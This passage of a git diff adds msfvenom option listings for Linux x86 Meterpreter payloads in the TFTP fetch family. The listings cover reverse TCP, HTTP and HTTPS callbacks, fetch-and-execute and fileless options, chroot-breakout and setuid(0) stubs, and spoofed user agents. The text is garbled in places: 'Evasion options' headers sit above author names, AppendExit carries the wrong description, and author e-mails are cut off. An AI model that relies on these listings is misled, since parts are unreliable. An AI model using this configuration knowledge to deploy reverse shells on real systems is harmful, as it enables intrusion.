will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_nonx_tcp.txt new file mode 100644 index 0000000..5c27eae --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_nonx_tcp.txt @@ -0,0 +1,109 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp: +========================= + + + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CzjraSqbEZxX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..9feb879 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp.txt @@ -0,0 +1,111 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp: +========================= + +apid7.com> + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZghrjpqncEbT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..f422eab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp_uuid.txt @@ -0,0 +1,111 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid: +========================= + + + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RsvPATWCwhOw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_http.txt new file mode 100644 index 0000000..24707cc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x86/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YBJaPeOj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_https.txt new file mode 100644 index 0000000..1060d1a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x86/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tkjNigsUqdJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fa9bbda --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + 